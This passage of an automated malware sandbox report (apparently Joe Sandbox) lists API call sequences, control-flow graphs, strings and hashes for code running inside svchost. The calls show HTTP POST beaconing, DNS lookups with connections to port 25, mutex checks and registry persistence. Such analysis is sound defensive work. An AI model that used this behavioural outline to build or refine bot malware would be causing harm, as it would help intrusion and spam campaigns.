                                                                                                                                                                                • connect.WS2_32(00000002,00000010,00000019), ref: 1314E153
                                                                                                                                                                                • GetLastError.KERNEL32(00000002,00000010,00000019,-00000004,00000041,00000000,00000002,00000001,00000000), ref: 1314E169
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314E174
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 1314E1AF
                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000), ref: 1314E1C1
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E1D8
                                                                                                                                                                                • closesocket.WS2_32(-00000004), ref: 1314E218
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E23F
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 1314E254
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E27C
                                                                                                                                                                                • shutdown.WS2_32(00000002,00000000), ref: 1314E2A5
                                                                                                                                                                                • closesocket.WS2_32 ref: 1314E2B0
                                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000002,00000001,00000000), ref: 1314E31E
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$closesocket$Sleep$Mutexconnecthtonsshutdownsocket$CreateErrorExitFreeLastListOpenProcessQuery_RecordSystemTimerecvsetsockopt
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 850683436-3203441087
                                                                                                                                                                                • Opcode ID: dd493c078322a192c5523dde1cef033dfa8865319dcbf82b87d552e4e9941a90
                                                                                                                                                                                • Instruction ID: b517c613e26f4d778944e9f90759b52dc2cffeb791a3b3e77eda24470bf5b908
                                                                                                                                                                                • Opcode Fuzzy Hash: dd493c078322a192c5523dde1cef033dfa8865319dcbf82b87d552e4e9941a90
                                                                                                                                                                                • Instruction Fuzzy Hash: 8AC1CEB5944359BBDB12AFB8CCC5AAEB779FB05708F24443AE105A3150EB38A940CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 110 40010a0-40010b4 111 400138a-4001390 110->111 112 40010ba-40010be 110->112 112->111 113 40010c4-40010c8 112->113 113->111 114 40010ce-4001160 call 4002420 InternetCrackUrlA 113->114 114->111 117 4001166-4001186 InternetOpenA 114->117 117->111 118 400118c-40011bf InternetConnectA 117->118 119 40011c5-40011fd HttpOpenRequestA 118->119 120 400137d-4001384 InternetCloseHandle 118->120 121 4001370-4001377 InternetCloseHandle 119->121 122 4001203-400123b wnsprintfA HttpAddRequestHeadersA 119->122 120->111 121->120 123 4001241-400124b 122->123 124 4001363-400136a InternetCloseHandle 122->124 125 4001255-4001270 HttpSendRequestA 123->125 124->121 126 4001276-4001281 125->126 127 4001329-400133b GetLastError 125->127 129 4001283-4001287 126->129 130 40012f4 126->130 128 4001341-4001354 127->128 128->124 132 4001356-400135d 128->132 129->130 133 4001289-400128d 129->133 131 40012fe-4001325 InternetReadFile 130->131 131->131 135 4001327 131->135 132->124 132->125 133->130 134 400128f-40012cc InternetReadFile 133->134 136 40012d0-40012ec 134->136 137 40012ce 134->137 135->128 139 40012f0 136->139 140 40012ee 136->140 138 40012f2 137->138 138->135 139->134 140->138
                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001268
                                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 040012AF
                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001318
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 04001329
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0400136A
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 04001377
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 04001384
                                                                                                                                                                                Strings
                                                                                                                                                                                • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0400116E
                                                                                                                                                                                • POST, xrefs: 040011DE
                                                                                                                                                                                • */*, xrefs: 040010EC
                                                                                                                                                                                • <, xrefs: 04001113
                                                                                                                                                                                • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 04001207
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$CloseHandleHttpRequest$FileOpenRead$ConnectCrackErrorHeadersLastSendwnsprintf
                                                                                                                                                                                • String ID: */*$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                • API String ID: 36006914-44380738
                                                                                                                                                                                • Opcode ID: 9fa4bf02c9ea75f79ff1d9f1478294966c7574d2fb6980f9e93de3fe7dc98a0e
                                                                                                                                                                                • Instruction ID: 924ce2a1f8c29fa5ce0fe30d710c3110d4c6ad508a20d83de47564b7f6a3be0e
                                                                                                                                                                                • Opcode Fuzzy Hash: 9fa4bf02c9ea75f79ff1d9f1478294966c7574d2fb6980f9e93de3fe7dc98a0e
                                                                                                                                                                                • Instruction Fuzzy Hash: 3981FFB0941218DFEB24CF54CC59BDEB7B5BB84704F008199E509BA2C0D77AAAE4CF55
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000002,00000001,00000000,00000000), ref: 13143EEA
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F34
                                                                                                                                                                                • htons.WS2_32(00000035), ref: 13143F48
                                                                                                                                                                                • Sleep.KERNEL32(00000035,00000035,?,?,?,?,?,?,?,?,?,?,?,0000007C), ref: 13143F75
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: htons$ReadSleep
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 317343359-0
                                                                                                                                                                                • Opcode ID: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction ID: 0cc42a1c999a2f236a246cc9ba181085ba80ff9704f394df86cf8783f9710338
                                                                                                                                                                                • Opcode Fuzzy Hash: 0551faee1106222f397e1c8bf519b9188c21c7dca297eb718ad6f420bc45b75c
                                                                                                                                                                                • Instruction Fuzzy Hash: 19A1C175940289EFCB01CFA8CD84DDEBBB9AF55304F2980A9E944B7251DB31AE44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 200 1314e325-1314e34b GetTickCount 201 1314e352-1314e380 call 13144d0b htons 200->201 204 1314e383-1314e389 201->204 205 1314e3e9 204->205 206 1314e38b-1314e3b5 call 13142f79 DnsQuery_A 204->206 207 1314e3eb-1314e3f1 205->207 212 1314e3b7-1314e3db call 13144d0b DnsRecordListFree 206->212 213 1314e3e0-1314e3e7 206->213 210 1314e462-1314e46f 207->210 211 1314e3f3-1314e3f9 207->211 216 1314e471-1314e478 210->216 217 1314e48a-1314e4aa call 13142f79 call 131506ce 210->217 214 1314e457-1314e460 211->214 215 1314e3fb-1314e43f socket setsockopt connect 211->215 212->213 213->204 213->205 214->207 214->210 220 1314e451-1314e452 closesocket 215->220 221 1314e441-1314e44c recv 215->221 222 1314e479-1314e47b 216->222 217->201 229 1314e4b0-1314e4b6 217->229 220->214 221->220 225 1314e484-1314e488 222->225 226 1314e47d 222->226 225->217 225->222 226->225 229->201 230 1314e4bc-1314e4ca Sleep 229->230 230->229 231 1314e4cc 230->231 231->201
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1314E337
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 1314E377
                                                                                                                                                                                • DnsQuery_A.DNSAPI(-00000004,00000001,00000000,00000000,?,00000000), ref: 1314E3AE
                                                                                                                                                                                • DnsRecordListFree.DNSAPI(?,?), ref: 1314E3DB
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 1314E401
                                                                                                                                                                                • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000008), ref: 1314E423
                                                                                                                                                                                • connect.WS2_32(00000000,00000002,00000010), ref: 1314E438
                                                                                                                                                                                • recv.WS2_32(00000000,1468EA2E,00000064,00000000), ref: 1314E44C
                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 1314E452
                                                                                                                                                                                • Sleep.KERNELBASE(000003E8,-00000004,00000048,00000000,00000019,?,?,00000000), ref: 1314E4C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFreeListQuery_RecordSleepTickclosesocketconnecthtonsrecvsetsockoptsocket
                                                                                                                                                                                • String ID: 0u
                                                                                                                                                                                • API String ID: 3184855960-3203441087
                                                                                                                                                                                • Opcode ID: 7c1a2f04b0526b786a152115b8f2b54173eee2e5751862b6d4812f2e9831c2f3
                                                                                                                                                                                • Instruction ID: ca660788ef7710c26ad6ab459e92a38f3dc0e22cb3ccb5353065bbacda7dbb4b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7c1a2f04b0526b786a152115b8f2b54173eee2e5751862b6d4812f2e9831c2f3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E41E172944359BBEB12DBA8CC81AEEB77CFF15B08F180439F605B7180EB7469448B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 232 4001cd0-4001cf2 WSAStartup 233 4001f90-4001f95 232->233 234 4001cf8-4001d23 VirtualAlloc 232->234 234->233 235 4001d29-4001d3d 234->235 236 4001d47-4001d96 call 4002080 htons 235->236 239 4001d98-4001dae 236->239 240 4001dcd-4001def gethostbyname 236->240 239->240 241 4001db0-4001dcb inet_addr 239->241 242 4001df1-4001dfe 240->242 243 4001e04-4001e0b 240->243 241->243 242->243 244 4001e12-4001e2a socket 243->244 245 4001e0d 243->245 246 4001e31-4001e90 setsockopt * 2 connect 244->246 247 4001e2c 244->247 245->236 248 4001e96-4001efc call 4002080 call 4002420 call 40020b0 call 4001fa0 246->248 249 4001f2a-4001f65 closesocket Sleep 246->249 247->236 248->249 262 4001efe-4001f22 call 4002000 248->262 250 4001f77 249->250 251 4001f67-4001f73 249->251 250->236 251->250 253 4001f75-4001f8a VirtualFree 251->253 253->233 264 4001f27 262->264 264->249
                                                                                                                                                                                APIs
                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 04001CEB
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00080000,00003000,00000004), ref: 04001D10
                                                                                                                                                                                • htons.WS2_32(00000019), ref: 04001D6A
                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 04001DC0
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 04001DDD
                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 04001E18
                                                                                                                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00001005,00001388,00000004), ref: 04001E55
                                                                                                                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00001006,00001388,00000004), ref: 04001E74
                                                                                                                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 04001E89
                                                                                                                                                                                • closesocket.WS2_32(000000FF), ref: 04001F31
                                                                                                                                                                                • Sleep.KERNELBASE(00000000,000000FF,0000FFFF,00001006,00001388,00000004), ref: 04001F3D
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001F8A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Virtualsetsockopt$AllocFreeSleepStartupclosesocketconnectgethostbynamehtonsinet_addrsocket
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3701309590-0
                                                                                                                                                                                • Opcode ID: eba8264825d544e27b5783e13d2b276375b44e68c0b3b3ddf4f61118a1edd19b
                                                                                                                                                                                • Instruction ID: ece18662fe2b9cdf33fc9f0a27d031b2bb85f6a87541587434ee5482b908719f
                                                                                                                                                                                • Opcode Fuzzy Hash: eba8264825d544e27b5783e13d2b276375b44e68c0b3b3ddf4f61118a1edd19b
                                                                                                                                                                                • Instruction Fuzzy Hash: 92613DB1A012149FFB24DB60CC55BEAB375BB49308F0085D9E649BB2C1DB75AE84CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 13145417: CreateFileA.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000006,00000000,1314333E,00016AF0,LoadLibraryExA,?), ref: 1314542F
                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 1314334A
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 13143355
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131433B2
                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 131433BA
                                                                                                                                                                                • OpenMutexA.KERNEL32 ref: 131433C8
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 131433DD
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegOpenKeyExA.KERNELBASE(80000002,-00000004,000000EA,00000000,000F003F,131433EC), ref: 1314AD6C
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegSetValueExA.KERNELBASE(131433EC,-00000004,0000002F,00000000,00000004,0000FFFE,00000004), ref: 1314AD91
                                                                                                                                                                                  • Part of subcall function 1314AD3E: RegCloseKey.KERNELBASE(131433EC), ref: 1314AD9A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpen$CountCreateExitFileHandleMutexProcessSleepStartupTickValue
                                                                                                                                                                                • String ID: LoadLibraryExA$uplcgp74169$vbknd96411$zczoiir65502
                                                                                                                                                                                • API String ID: 1822930774-3322773679
                                                                                                                                                                                • Opcode ID: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                • Instruction ID: 175d5b4083d35df8bae9dcae2fdc8861bee5e9bc7d1d616874c1029d22c04ec3
                                                                                                                                                                                • Opcode Fuzzy Hash: d44503abb5acae26affaa828dc1f0dea3289bfaaf1818dfe82d0d955aeab762a
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A11C4BA700365EFE7007BB98DC8B1E7A5CAB05258F784835EA05D2544FF38E8148A71
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • gethostname.WS2_32(?,00000040), ref: 13146229
                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 13146232
                                                                                                                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,?,LoadLibraryExA), ref: 1314625B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendARP), ref: 1314626D
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,LoadLibraryExA), ref: 13146278
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProcgethostbynamegethostname
                                                                                                                                                                                • String ID: LoadLibraryExA$SendARP$iphlpapi.dll
                                                                                                                                                                                • API String ID: 4149995341-444255208
                                                                                                                                                                                • Opcode ID: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                • Instruction ID: 7a2c4663479ef9ad84a752d5c9230923e458e2ff35e9fb1722c16f79618e7024
                                                                                                                                                                                • Opcode Fuzzy Hash: 8be703f6ceac838963bb9a41fe6ec4b7937a1430acc57a5dd30f2e302a0a1b54
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C119EB6E10319BBDB11ABF4CD8AFCE7BACAF08659F144430F901E6140E7B8D64086A0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 04001030: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0400104C
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 04001B96
                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000800,00003000,00000004), ref: 04001BB8
                                                                                                                                                                                • wsprintfA.USER32 ref: 04001C0A
                                                                                                                                                                                  • Part of subcall function 04002080: QueryPerformanceCounter.KERNEL32(00000000), ref: 04002094
                                                                                                                                                                                  • Part of subcall function 040020B0: QueryPerformanceCounter.KERNEL32(?), ref: 040020E7
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001158
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 04001173
                                                                                                                                                                                  • Part of subcall function 040010A0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040011AC
                                                                                                                                                                                  • Part of subcall function 040010A0: HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,040030AC,00600100,00000000), ref: 040011EA
                                                                                                                                                                                  • Part of subcall function 040010A0: wnsprintfA.SHLWAPI ref: 04001218
                                                                                                                                                                                  • Part of subcall function 040010A0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 04001233
                                                                                                                                                                                • Sleep.KERNELBASE(00000000), ref: 04001C60
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001CAE
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 04001CB9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$Open$CounterHttpPerformanceQueryRequestVirtual$AllocConnectCrackFreeHeadersInitializeSleepUninitializewnsprintfwsprintf
                                                                                                                                                                                • String ID: http://%s/
                                                                                                                                                                                • API String ID: 2417088823-3353559419
                                                                                                                                                                                • Opcode ID: 42f0819b840b9358b28b6bd0552893a0d48155a987d5c5a954953fce4658f698
                                                                                                                                                                                • Instruction ID: 878aa3c5fb1e96f414b6b1808169c8e5272be758e8650f444b0dce9c95422ffe
                                                                                                                                                                                • Opcode Fuzzy Hash: 42f0819b840b9358b28b6bd0552893a0d48155a987d5c5a954953fce4658f698
                                                                                                                                                                                • Instruction Fuzzy Hash: 953176B1D01204ABFB54DF94DC4ABDE77B4AB04708F148168E605BA2C1D775AA84CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 338 13143202-13143230 GetCurrentThreadId CreateThread 339 13143232-13143234 338->339 340 13143239-1314324b CreateThread 338->340 341 131432c0-131432c4 339->341 340->339 342 1314324d-1314325b Sleep 340->342 343 13143263-1314326a 342->343 344 13143281-13143294 CreateThread 343->344 345 1314326c-1314327f Sleep 343->345 344->339 346 13143296-131432a8 CreateThread 344->346 345->343 345->344 346->339 347 131432aa-131432be CreateThread 346->347 347->341
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143206
                                                                                                                                                                                • CreateThread.KERNELBASE ref: 1314322C
                                                                                                                                                                                • CreateThread.KERNELBASE ref: 13143247
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4,?,?,131433FF), ref: 13143259
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 13143271
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,1314609A,00000000,00000000,1315B688), ref: 1314328F
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,13144898,00000000,00000000,1315B68C), ref: 131432A4
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,0000FA00,1314CCD7,00000000,00000000,1315B694), ref: 131432B8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$Create$Sleep$Current
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 773548574-0
                                                                                                                                                                                • Opcode ID: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                • Instruction ID: dd442d82ce1d7506068b13048ddc8b54df2e144e20bd1b72f1d0a51d7373427f
                                                                                                                                                                                • Opcode Fuzzy Hash: 485e2c268a206b43ffbfe4ffce24d5252f72a8d4056e7c0c36fab4777ce81126
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11E1F07813AA7FF6106B718CC4DB73AACEB8678AB204929F521A2086D7249C049970
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 131453CC: GetEnvironmentVariableA.KERNEL32(-00000004,0000002B,C:\Windows\system32\regedit.exe,00000103,LoadLibraryExA), ref: 131453EC
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAddBackslashA.KERNELBASE(C:\Windows\system32\regedit.exe), ref: 131453F7
                                                                                                                                                                                  • Part of subcall function 131453CC: PathAppendA.SHLWAPI(C:\Windows\system32\regedit.exe,-00000004,00000028), ref: 1314540C
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 1314AC94
                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 1314ACA7
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 1314ACC3
                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,-00000004,00000071,00000000,000F003F,?), ref: 1314ACEA
                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,-00000004,00000070,00000000,00000001,?,00000104), ref: 1314AD26
                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 1314AD2F
                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 1314AD3A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PathSleep$AppendBackslashCloseEnvironmentOpenValueVariablelstrlenwnsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3351196999-0
                                                                                                                                                                                • Opcode ID: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                • Instruction ID: a34f9d23611f9d677bd6044601ea1e3f523b2ceb4555f11e2428dda48e926ab4
                                                                                                                                                                                • Opcode Fuzzy Hash: 4fe2e70fd3ef2641633fd1c8d446a576e648f97e0ad43ca10d89397cd0296cbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C113075A40219FFFB05ABE5CD45FEE777CAB04708F100020E605B6095E7B46A44DB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 364 13144bc5-13144bdb HeapCreate 365 13144c13-13144c1e 364->365 366 13144bdd-13144bf3 HeapCreate 364->366 367 13144bf5-13144c05 HeapCreate 366->367 368 13144c12 366->368 367->368 369 13144c07-13144c0d GetProcessHeap 367->369 368->365 369->368
                                                                                                                                                                                APIs
                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00000000,00000000,LoadLibraryExA,?,1314337F,00000000,00016AF0,LoadLibraryExA,?), ref: 13144BD2
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,1DCD6500,00016AF0), ref: 13144BEA
                                                                                                                                                                                • HeapCreate.KERNEL32(00000000,001E8480,05F5E100), ref: 13144BFC
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 13144C07
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Create$Process
                                                                                                                                                                                • String ID: LoadLibraryExA
                                                                                                                                                                                • API String ID: 846323464-2601528877
                                                                                                                                                                                • Opcode ID: 2e8d6702a9d4fa7ee5d00ea2ac3fa87fef18c2b02f9a4083b144cebf07a7a476
